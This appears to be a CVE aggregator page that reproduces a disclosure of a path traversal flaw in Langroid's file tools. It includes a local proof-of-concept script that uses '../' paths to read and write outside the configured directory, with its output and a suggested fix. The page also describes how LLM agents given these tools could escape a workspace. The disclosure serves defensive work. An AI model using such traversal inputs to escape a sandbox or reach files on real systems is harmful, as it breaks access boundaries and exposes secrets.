CVE-2026-50181

HIGHPre-NVD 7.17.1
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.1 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
7.1
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 7.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Langroid: Path traversal in the file tools allows read/write outside configured current directory

Summary

Langroid's ReadFileTool and WriteFileTool appear to treat curr_dir as the intended working-directory boundary for file operations. However, the tools only change the process working directory to curr_dir and then operate on the user-supplied file_path without resolving and enforcing that the final path remains inside curr_dir.

As a result, a tool caller can supply path traversal sequences such as ../secret.txt to read files outside the configured current directory, or ../written_by_tool.txt to write files outside that directory.

This can impact applications that expose Langroid file tools to an LLM agent, user-controlled tool call, or delegated coding/documentation agent while relying on curr_dir to restrict file access to a project/workspace directory.

Details

Affected components:

  • langroid/agent/tools/file_tools.py
  • langroid/utils/system.py

Relevant behavior observed:

ReadFileTool contains a comment indicating the intended assumption:

```text

ASSUME: file_path should be relative to the curr_dir

The tool then changes into the configured current directory and calls read_file(self.file_path).

WriteFileTool similarly resolves curr_dir, changes into that directory, and calls create_file(self.file_path, self.content).

The issue is that changing the process working directory does not prevent traversal. A path such as ../secret.txt is still valid and resolves outside the configured curr_dir.

In local testing, ReadFileTool successfully read a file outside the configured sandbox directory, and WriteFileTool successfully wrote a file outside the configured sandbox directory.

PoC

Tested locally against the current Langroid repository checkout.

Environment:

Python 3.12 Langroid installed in editable mode with pip install -e .

PoC script:

from pathlib import Path from tempfile import TemporaryDirectory import os

os.environ["docker"] = "false" os.environ["DOCKER"] = "false"

from langroid.agent.tools.file_tools import ReadFileTool, WriteFileTool

class DummyIndex: def add(self, files): print("dummy git add:", files)

def commit(self, message): print("dummy git commit:", message)

class DummyRepo: index = DummyIndex()

with TemporaryDirectory() as root: base = Path(root) sandbox = base / "sandbox" sandbox.mkdir()

secret = base / "secret.txt" secret.write_text("LANGROID_TOOL_ESCAPE_PROOF", encoding="utf-8")

ReadSandbox = ReadFileTool.create(get_curr_dir=lambda: sandbox) read_tool = ReadSandbox(file_path="../secret.txt")

print("READ TOOL RESULT:") print(read_tool.handle())

WriteSandbox = WriteFileTool.create( get_curr_dir=lambda: sandbox, get_git_repo=lambda: DummyRepo(), )

write_tool = WriteSandbox( file_path="../written_by_tool.txt", content="WRITTEN_BY_LANGROID_TOOL", language="text", )

print("WRITE TOOL RESULT:") print(write_tool.handle())

outside = base / "written_by_tool.txt" print("outside exists:", outside.exists()) print("outside content:", outside.read_text(encoding="utf-8"))

Observed output:

READ TOOL RESULT:

CONTENTS of ../secret.txt: (Line numbers added for reference only!) --------------------------- 1: LANGROID_TOOL_ESCAPE_PROOF

WRITE TOOL RESULT: Content created/updated in: ..\written_by_tool.txt dummy git add: ['../written_by_tool.txt'] dummy git commit: Agent write file tool Content written to ../written_by_tool.txt and committed outside exists: True outside content: WRITTEN_BY_LANGROID_TOOL

This demonstrates that both read and write operations can escape the configured curr_dir using ../ traversal.

Impact

If an application enables Langroid's file tools and treats curr_dir as a project, workspace, repository, or sandbox boundary, a tool caller can escape that boundary.

Potential impact includes:

Reading files outside the intended workspace. Writing files outside the intended workspace. Exposing local secrets, configuration files, source files, environment files, or other project-adjacent files. Modifying files outside the intended project directory if WriteFileTool is enabled.

This is especially relevant in agentic workflows where an LLM or external user can influence tool arguments.

This report does not claim unauthenticated remote exploitation by default. The impact depends on how an application exposes Langroid file tools and whether curr_dir is intended to restrict file access.

Suggested remediation

Before reading, writing, or listing files, resolve the configured base directory and the requested target path, then reject any path that escapes the base directory.

Example patch pattern:

from pathlib import Path

def safe_join(base_dir: str | Path, user_path: str | Path) -> Path: base = Path(base_dir).resolve() target = (base / user_path).resolve()

if target != base and base not in target.parents: raise ValueError("Path escapes configured current directory")

return target

Then use the resolved safe path for ReadFileTool, WriteFileTool, and ListDirTool.

Suggested regression tests:

ReadFileTool(file_path="../secret.txt") should be rejected. WriteFileTool(file_path="../outside.txt") should be rejected. Absolute paths outside curr_dir should be rejected. Symlink-based escapes should be rejected after final path resolution. Normal relative paths inside curr_dir, such as src/main.py, should continue to work.

Langroid CVE Report.pdf

CVSS v3
7.1
EG Score
7.1(low)
EPSS
KEV
Not listed

Published

July 2, 2026

Last Modified

July 2, 2026

Vendor Advisories for CVE-2026-50181(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 10× in last 7d / 10× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-06 22:20 UTCEG score recompute
  2. 2026-07-06 11:12 UTCEG score recompute
  3. 2026-07-06 00:01 UTCEG score recompute
  4. 2026-07-05 12:53 UTCEG score recompute
  5. 2026-07-05 01:45 UTCEG score recompute
  6. 2026-07-04 14:37 UTCEG score recompute
  7. 2026-07-04 03:29 UTCEG score recompute
  8. 2026-07-03 16:21 UTCEG score recompute
  9. 2026-07-03 05:13 UTCEG score recompute
  10. 2026-07-02 18:05 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-50181?
CVE-2026-50181 is a high vulnerability published on July 2, 2026. Langroid: Path traversal in the file tools allows read/write outside configured current directory Summary Langroid's ReadFileTool and WriteFileTool appear to treat currdir as the intended working-directory boundary for file operations. However, the tools only change the process working directory to…
When was CVE-2026-50181 disclosed?
CVE-2026-50181 was first published in the National Vulnerability Database on July 2, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-50181?
CVE-2026-50181 has a CVSS v4.0 base score of 7.1 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-50181?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-50181, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-50181

Explore →

Is Your Infrastructure Affected by CVE-2026-50181?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.